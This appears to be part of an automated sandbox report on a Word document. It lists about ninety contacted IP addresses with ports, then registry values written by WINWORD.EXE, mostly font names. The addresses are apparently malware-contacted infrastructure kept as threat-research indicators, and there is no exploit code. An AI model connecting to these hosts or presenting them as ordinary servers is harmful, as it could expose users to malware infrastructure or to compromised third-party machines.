||
213.52.74.198:80
|
unknown
|
unknown
|
unknown
|
||
181.10.46.92:80
|
unknown
|
unknown
|
unknown
|
||
51.255.203.164
|
unknown
|
France
|
unknown
|
||
191.223.36.170:80
|
unknown
|
unknown
|
unknown
|
||
83.169.21.32:7080
|
unknown
|
unknown
|
unknown
|
||
186.177.174.163:80
|
unknown
|
unknown
|
unknown
|
||
70.32.84.74:8080
|
unknown
|
unknown
|
unknown
|
||
217.13.106.14:8080
|
unknown
|
unknown
|
unknown
|
||
138.97.60.141:7080
|
unknown
|
unknown
|
unknown
|
||
111.67.12.221:8080
|
unknown
|
unknown
|
unknown
|
||
201.185.69.28:443
|
unknown
|
unknown
|
unknown
|
||
45.16.226.117:443
|
unknown
|
unknown
|
unknown
|
||
51.15.7.145:80
|
unknown
|
unknown
|
unknown
|
||
82.208.146.142:7080
|
unknown
|
unknown
|
unknown
|
||
1.226.84.243:8080
|
unknown
|
unknown
|
unknown
|
||
84.232.229.24
|
unknown
|
Romania
|
unknown
|
||
70.32.115.157:8080
|
unknown
|
unknown
|
unknown
|
||
217.160.169.110:8080
|
unknown
|
unknown
|
unknown
|
||
85.105.239.184:443
|
unknown
|
unknown
|
unknown
|
||
152.170.79.100:80
|
unknown
|
unknown
|
unknown
|
||
143.0.85.206:7080
|
unknown
|
unknown
|
unknown
|
||
35.163.191.195
|
unknown
|
United States
|
unknown
|
||
51.255.203.164:8080
|
unknown
|
unknown
|
unknown
|
||
94.176.234.118:443
|
unknown
|
unknown
|
unknown
|
||
50.28.51.143:8080
|
unknown
|
unknown
|
unknown
|
||
31.27.59.105:80
|
unknown
|
unknown
|
unknown
|
||
185.94.252.27:443
|
unknown
|
unknown
|
unknown
|
||
190.114.254.163:8080
|
unknown
|
unknown
|
unknown
|
||
197.232.36.108:80
|
unknown
|
unknown
|
unknown
|
||
190.45.24.210:80
|
unknown
|
unknown
|
unknown
|
||
185.183.16.47:80
|
unknown
|
unknown
|
unknown
|
||
190.24.243.186:80
|
unknown
|
unknown
|
unknown
|
||
190.64.88.186:443
|
unknown
|
unknown
|
unknown
|
||
82.48.39.246:80
|
unknown
|
unknown
|
unknown
|
||
191.241.233.198:80
|
unknown
|
unknown
|
unknown
|
||
170.81.48.2:80
|
unknown
|
unknown
|
unknown
|
||
172.245.248.239:8080
|
unknown
|
unknown
|
unknown
|
||
95.76.153.115:80
|
unknown
|
unknown
|
unknown
|
||
154.127.113.242:80
|
unknown
|
unknown
|
unknown
|
||
211.215.18.93:8080
|
unknown
|
unknown
|
unknown
|
||
177.12.170.95
|
unknown
|
Brazil
|
unknown
|
||
80.249.176.206:80
|
unknown
|
unknown
|
unknown
|
||
110.39.160.38:443
|
unknown
|
unknown
|
unknown
|
||
137.74.106.111:7080
|
unknown
|
unknown
|
unknown
|
||
5.196.35.138:7080
|
unknown
|
unknown
|
unknown
|
||
188.135.15.49:80
|
unknown
|
unknown
|
unknown
|
||
46.43.2.95:8080
|
unknown
|
unknown
|
unknown
|
||
68.183.190.199:8080
|
unknown
|
unknown
|
unknown
|
||
177.23.7.151:80
|
unknown
|
unknown
|
unknown
|
||
201.48.121.65:443
|
unknown
|
unknown
|
unknown
|
||
105.209.235.113:8080
|
unknown
|
unknown
|
unknown
|
||
60.93.23.51:80
|
unknown
|
unknown
|
unknown
|
||
62.84.75.50:80
|
unknown
|
unknown
|
unknown
|
||
190.247.139.101:80
|
unknown
|
unknown
|
unknown
|
||
177.85.167.10:80
|
unknown
|
unknown
|
unknown
|
||
51.255.165.160:8080
|
unknown
|
unknown
|
unknown
|
||
172.104.169.32:8080
|
unknown
|
unknown
|
unknown
|
||
68.183.170.114:8080
|
unknown
|
unknown
|
unknown
|
||
149.202.72.142:7080
|
unknown
|
unknown
|
unknown
|
||
209.33.120.130:80
|
unknown
|
unknown
|
unknown
|
||
178.250.54.208:8080
|
unknown
|
unknown
|
unknown
|
||
12.163.208.58:80
|
unknown
|
unknown
|
unknown
|
||
84.232.229.24:80
|
unknown
|
unknown
|
unknown
|
||
81.17.93.134:80
|
unknown
|
unknown
|
unknown
|
||
152.231.89.226:80
|
unknown
|
unknown
|
unknown
|
||
35.209.96.32
|
unknown
|
United States
|
unknown
|
||
87.106.46.107:8080
|
unknown
|
unknown
|
unknown
|
||
202.134.4.210:7080
|
unknown
|
unknown
|
unknown
|
||
78.206.229.130:80
|
unknown
|
unknown
|
unknown
|
||
12.162.84.2:8080
|
unknown
|
unknown
|
unknown
|
||
190.162.232.138:80
|
unknown
|
unknown
|
unknown
|
||
187.162.248.237:80
|
unknown
|
unknown
|
unknown
|
||
152.169.22.67:80
|
unknown
|
unknown
|
unknown
|
||
109.101.137.162:8080
|
unknown
|
unknown
|
unknown
|
||
122.201.23.45:443
|
unknown
|
unknown
|
unknown
|
||
85.214.26.7:8080
|
unknown
|
unknown
|
unknown
|
||
188.225.32.231:7080
|
unknown
|
unknown
|
unknown
|
||
104.168.154.203
|
unknown
|
United States
|
unknown
|
||
190.251.216.100:80
|
unknown
|
unknown
|
unknown
|
||
104.131.41.185:8080
|
unknown
|
unknown
|
unknown
|
||
80.15.100.37:80
|
unknown
|
unknown
|
unknown
|
||
81.215.230.173:443
|
unknown
|
unknown
|
unknown
|
||
167.71.148.58:443
|
unknown
|
unknown
|
unknown
|
||
46.105.114.137:8080
|
unknown
|
unknown
|
unknown
|
||
110.39.162.2:443
|
unknown
|
unknown
|
unknown
|
||
178.211.45.66:8080
|
unknown
|
unknown
|
unknown
|
||
190.210.246.253:80
|
unknown
|
unknown
|
unknown
|
||
81.214.253.80:443
|
unknown
|
unknown
|
unknown
|
||
138.197.99.250:8080
|
unknown
|
unknown
|
unknown
|
There are 90 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
:o7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
3p7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
<q7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC265
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
